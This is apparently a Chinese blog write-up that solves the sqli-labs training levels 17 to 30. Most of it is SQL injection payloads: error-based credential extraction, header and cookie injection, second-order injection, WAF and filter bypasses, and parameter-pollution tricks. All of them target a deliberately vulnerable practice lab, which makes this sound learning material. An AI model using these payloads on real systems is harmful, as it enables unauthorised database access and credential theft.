less-17

刚开始发现uname被waf,一直在找怎么绕过WAF,但其实是找最佳注入点,
于是找passwd注入,而且可以报错

payload:

User Name:admin
New Password:1' and updatexml(1,concat(0x7e,(select concat(id,username,password) from (select id,username,password from users LIMIT 0,1)a),0x7e),1)#

less-18

User-Agent注入,同样可以报错,要登录成功才能插入User-Agent

payload:

User-Agent:1' and updatexml(1,concat(0x7e,(select concat(id,username,password)from users limit 0,1),0x7e),1) and '1'='1

uname=admin&passwd=1&submit=Submit

less-19

Referer注入,payload同上

Referer:1' and updatexml(1,concat(0x7e,(select concat(id,username,password)from users LIMIT 0,1),0x7e),1) and '1'='1

uname=admin&passwd=1&submit=Submit

less-20

cookies注入,不能带Submit参数
payload:

Cookie:uname=admin' and updatexml(1,concat(0x7e,(select concat(id,username,password)from users LIMIT 0,1),0x7e),1) and '1'='1

uname=admin&passwd=123456

less-21

cookie 进行了base64解密,那么将注入语句进行base64加密
less-21
payload:

Cookie:YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGNvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZClmcm9tIHVzZXJzIExJTUlUIDAsMSksMHg3ZSksMSkgYW5kICcxJz0nMQ==

less-21

less-22

单引号闭合变双引号
less-22
payload:

Cookie:uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGNvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZClmcm9tIHVzZXJzIExJTUlUIDAsMSksMHg3ZSksMSkj

less-22

less-23

过滤了注释符,于是拼接

这里有两种构造方法:
一:

SELECT * FROM users WHERE id='0' union select 1,(select group_concat(schema_name)from information_schema.schemata),'1'

二:

SELECT * FROM users WHERE id='0' union select 1, group_concat(table_name),'1' FROM information_schema.table WHERE table_schema=database() and '1'='1'

第二种只有在有条件(WHERE)才能用

爆数据库:

id=0' union select 1,(select group_concat(schema_name)from information_schema.schemata),'1

爆表:

id=0' union select 1, group_concat(table_name),'1' FROM information_schema.table WHERE table_schema=database() and '1'='1

爆列:

id=0' union select 1, group_concat(column_name),'1' FROM information_schema.columns WHERE table_name='users' and '1'='1

爆值:

id=0' union select 1,(select group_concat(id) from users),'1

less-24

考察点二次注入

注册账号:

Username:admin’#
Password:123456

less-24

注册时,mysql_escape_string将单引号转义,导致admin'#没有构成闭合,登录同样也是如此
登录账号,此时$_SESSION['username']=admin'#,改密码$_SESSION['username']没有转义,语句被构造成

UPDATE users SET PASSWORD='$pass' where username='admin'# and password='$curr_pass'

单引号被闭合,导致用户admin账户密码被更改

less-25

过滤了or AND,忽略大小写,但是不用也可以注入

0' union select 1,1,concat(id,username,passwoorrd) from users LIMIT 0,1%23

报错注入需要or或者AND,可以用||代替,也可以双写绕过

0' aandnd updatexml(1,concat(0x7e,(select concat(id,username,passwoorrd)from users LIMIT 0,1),0x7e),1)%23
0' || updatexml(1,concat(0x7e,(select concat(id,username,passwoorrd)from users LIMIT 0,1),0x7e),1)%23

less-25a

同样的,正常注入可以的,只是不输出错误了

0 union select 1,1,concat(id,username,passwoorrd) from users%23

less-26

linux搭一下sqli-labs

过滤了空格,注释符也没了,
空格用%a0,注释符没了,前面加单引号闭合
尝试:

id=0%27%a0union%a0select%a01,2,%273

less-26

爆数据库:

id=0%27%a0union%a0select%a01,(SELECT%a0group_concat(schema_name)%a0FROM%a0infoorrmation_schema.schemata),%273

爆表:

id=0%27%a0union%a0select%a01,(SELECT%a0group_concat(table_name)%a0FROM%a0infoorrmation_schema.tables%a0WHERE%a0table_schema=database()),%273

爆列:

id=0%27%a0union%a0select%a01,(SELECT%a0group_concat(column_name)%a0FROM%a0infoorrmation_schema.columns%a0WHERE%a0table_name='users'),%273

爆值:

id=0%27%a0union%a0select%a01,(SELECT%a0concat(id,username,passwoorrd)%a0FROM%a0users%a0LIMIT%a00,1),%273

报错注入payload:

id=0%27%a0||%a0updatexml(1,concat(0x7e,(select%a0concat(id,username,passwoorrd)from%a0users%a0limit%20%a00,1),0x7e),1)%a0anandd%a0%271%27=%271

less-26a

跟less-26变化就是闭合问题,还有没法报错注入

payload:

id=0%27)%a0union%a0select%a01,(SELECT%a0concat(id,username,passwoorrd)%a0FROM%a0users%a0LIMIT%a00,1),(%273

less-27

空格过滤了,selectSELECT被过滤,但是混合大小写没事

尝试注入

id=0%27%a0UniOn%a0SeLect%a01,2,%273

成功
payload:

id=0%27%a0UniOn%a0SelEct%a01,(sELeCT%a0concat(id,username,password)%a0FROM%a0users%a0LIMIT%a00,1),%273

less-27a

有查询结果,直接注入
当前数据库:

id=0"%a0UnIOn%a0SEleCt%a01,database(),"3

payload:

id=0"%a0UniOn%a0SelEct%a01,(sELeCT%a0concat(id,username,password)%a0FROM%a0users%a0LIMIT%a00,1),"3

less-28

用less-27的方法可以过
过滤union select忽略大小写,空格可以用%a0可以让正则无法匹配成功

id=0')%a0union%a0select%a01,database(),('3

less-28a

id=0%27)%20union%a0select%201,2,3%23

less-29

感觉出错题了,跟less-1一样

id=0%27union%20select%201,2,3%23

成功查到结果

less-30

less-30好有意思,challenge在login.php
宇宙无敌waf

function whitelist($input)
{
    $match = preg_match("/^\d+$/", $input);
    if($match)
    {
        //echo "you are good";
        //return $match;
    }
    else
    {   
        header('Location: hacked.php');
        //echo "you are bad";
    }
}

只允许数字2333,呜呜呜
但是看到java_implimentation函数

function java_implimentation($query_string)
{
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);


    foreach($qs_array as $key => $value)
    {
        $val=substr($value,0,2);
        if($val=="id")
        {
            $id_value=substr($value,3,30); 
            return $id_value;
            echo "<br>";
            break;
        }

    }

}

QUERY_STRING&分隔,遍历到id就返回值
payload:

?id=1&id="union select 1,2,3%23

$id1等于1成功绕过,id="union select 1,2,3%23带入查询构成

SELECT * FROM users WHERE id=""union select 1,2,3%23
Categories: sqlweb

Leave a Reply

Your email address will not be published. Required fields are marked *